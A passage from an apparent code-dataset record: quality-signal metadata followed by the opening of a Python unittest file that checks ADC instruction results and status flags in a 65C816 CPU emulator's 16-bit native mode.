| qsc_code_frac_chars_dupe_5grams | 0.901496 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.894533 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.884992 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.87442 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.869263 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.869263 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.058502 | 0 |
| qsc_code_frac_chars_whitespace | 0.141765 | 0 |
| qsc_code_size_file_byte | 5,756 | 0 |
| qsc_code_num_lines | 114 | 0 |
| qsc_code_num_chars_line_max | 178 | 0 |
| qsc_code_num_chars_line_mean | 50.491228 | 0 |
| qsc_code_frac_chars_alphabet | 0.726518 | 0 |
| qsc_code_frac_chars_comments | 0.417651 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.75 | 1 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.167572 | 0 |
| qsc_code_frac_chars_long_word_length | 0.121075 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 0 | 1 |
| qsc_codepython_frac_lines_func_ratio | null | 0 |
| qsc_codepython_cate_var_zero | null | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.09375 | 0 |
| qsc_codepython_frac_lines_simplefunc | null | 0 |
| qsc_codepython_score_lines_no_logic | null | 0 |
| qsc_codepython_frac_lines_print | 0.03125 | 0 |
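Note that eval_hmdb.py above uses Python 2 print statements, and its qsc_codepython_cate_ast_quality_signal is 0 (with the unsuffixed flag set to 1) while AST-derived signals such as qsc_codepython_frac_lines_func_ratio_quality_signal are null. That is consistent with a Python 3 AST parse check along the following lines, although the actual pipeline definition is not given in this document.

```python
# Sketch of an AST-validity check like the one qsc_codepython_cate_ast appears
# to capture (assumption; the real pipeline may differ). Python 2 print
# statements, as in eval_hmdb.py, raise SyntaxError under Python 3.
import ast

def parses_as_python3(source: str) -> bool:
    try:
        ast.parse(source)
        return True
    except SyntaxError:
        return False
```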
Record 4 metadata:

| field | value |
|---|---|
| hexsha | 1e639588e7ad61966318c61bae353a50f286efae |
| size | 119,373 |
| ext | py |
| lang | Python |
| max_stars_repo_path | test_mpu65c816_native_16.py |
| max_stars_repo_name | tmr4/py65_65816 |
| max_stars_repo_head_hexsha | 9e905ce1dc73463eabe131324a30e242b36765a3 |
| max_stars_repo_licenses | ["BSD-2-Clause"] |
| max_stars_count | 2 |
| max_stars_repo_stars_event_min_datetime | 2022-01-11T20:10:16.000Z |
| max_stars_repo_stars_event_max_datetime | 2022-01-12T07:43:50.000Z |
| max_issues_repo_path | test_mpu65c816_native_16.py |
| max_issues_repo_name | tmr4/py65_65816 |
| max_issues_repo_head_hexsha | 9e905ce1dc73463eabe131324a30e242b36765a3 |
| max_issues_repo_licenses | ["BSD-2-Clause"] |
| max_issues_count | null |
| max_issues_repo_issues_event_min_datetime | null |
| max_issues_repo_issues_event_max_datetime | null |
| max_forks_repo_path | test_mpu65c816_native_16.py |
| max_forks_repo_name | tmr4/py65_65816 |
| max_forks_repo_head_hexsha | 9e905ce1dc73463eabe131324a30e242b36765a3 |
| max_forks_repo_licenses | ["BSD-2-Clause"] |
| max_forks_count | null |
| max_forks_repo_forks_event_min_datetime | null |
| max_forks_repo_forks_event_max_datetime | null |

content (test_mpu65c816_native_16.py, reproduced verbatim):
import unittest
import sys
import devices.mpu65c816
# x tests
class MPUTests(unittest.TestCase):
"""CMOS 65C816 Tests - Native Mode - 16 Bit"""
def test_repr(self):
mpu = self._make_mpu()
self.assertTrue('65C816' in repr(mpu))
# Native Mode - 16 bit
# ADC Absolute
def test_adc_bcd_off_absolute_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0
self.assertEqual(0x30000, len(mpu.memory))
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_absolute_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.p |= mpu.CARRY
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_absolute_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_absolute_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_absolute_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_absolute_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_absolute_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_absolute_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_absolute_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
# $0000 ADC $C000
self._write(mpu.memory, 0x0000, (0x6D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Absolute, X-Indexed
def test_adc_bcd_off_abs_x_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_x_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_abs_x_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_x_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_x_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0xFF, 0xff))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_x_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.x = 0x03
# $0000 ADC $C000,X
self._write(mpu.memory, 0x0000, (0x7D, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.x, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Absolute, Y-Indexed
def test_adc_bcd_off_abs_y_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.y = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_abs_y_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_abs_y_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0xFF, 0xff))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_abs_y_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.y = 0x03
# $0000 ADC $C000,Y
self._write(mpu.memory, 0x0000, (0x79, 0x00, 0xC0))
self._write(mpu.memory, 0xC000 + mpu.y, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0003, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page
def test_adc_bcd_off_dp_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.p |= mpu.CARRY
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_dp_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.a = 0x4000
mpu.p &= ~(mpu.OVERFLOW)
# $0000 ADC $00B0
self._write(mpu.memory, 0x0000, (0x65, 0xB0))
self._write(mpu.memory, 0xB0, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page, X-Indexed
def test_adc_bcd_off_dp_x_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_x_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
self.assertNotEqual(mpu.CARRY, mpu.p & mpu.CARRY)
def test_adc_bcd_off_dp_x_carry_clear_in_no_carry_clear_out(self):
mpu = self._make_mpu()
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0xFE, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0xFFFF, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_x_carry_clear_in_carry_set_out(self):
mpu = self._make_mpu()
mpu.a = 0x02
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x0001, mpu.a)
self.assertEqual(mpu.CARRY, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(0, mpu.p & mpu.ZERO)
def test_adc_bcd_off_dp_x_overflow_clr_no_carry_01_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x02, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_x_overflow_clr_no_carry_01_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x01
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_x_overflow_set_no_carry_7f_plus_01(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x7fff
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x01, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_x_overflow_set_no_carry_80_plus_ff(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.CARRY)
mpu.a = 0x8000
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0xFF, 0xFF))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x7fff, mpu.a)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
def test_adc_bcd_off_dp_x_overflow_set_on_40_plus_40(self):
mpu = self._make_mpu()
mpu.p &= ~(mpu.OVERFLOW)
mpu.a = 0x4000
mpu.x = 0x03
# $0000 ADC $0010,X
self._write(mpu.memory, 0x0000, (0x75, 0x10))
self._write(mpu.memory, 0x10 + mpu.x, (0x00, 0x40))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x8000, mpu.a)
self.assertEqual(mpu.NEGATIVE, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.OVERFLOW, mpu.p & mpu.OVERFLOW)
self.assertEqual(0, mpu.p & mpu.ZERO)
# ADC Direct Page Indirect, Indexed (X)
def test_adc_bcd_off_ind_indexed_carry_clear_in_accumulator_zeroes(self):
mpu = self._make_mpu()
mpu.a = 0x00
mpu.x = 0x03
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x00, mpu.a)
self.assertEqual(0, mpu.p & mpu.CARRY)
self.assertEqual(0, mpu.p & mpu.NEGATIVE)
self.assertEqual(mpu.ZERO, mpu.p & mpu.ZERO)
def test_adc_bcd_off_ind_indexed_carry_set_in_accumulator_zero(self):
mpu = self._make_mpu()
mpu.a = 0
mpu.x = 0x03
mpu.p |= mpu.CARRY
# $0000 ADC ($0010,X)
# $0013 Vector to $ABCD
self._write(mpu.memory, 0x0000, (0x61, 0x10))
self._write(mpu.memory, 0x0013, (0xCD, 0xAB))
self._write(mpu.memory, 0xABCD, (0x00, 0x00))
mpu.step()
self.assertEqual(0x0002, mpu.pc)
self.assertEqual(0x01, mpu.a)
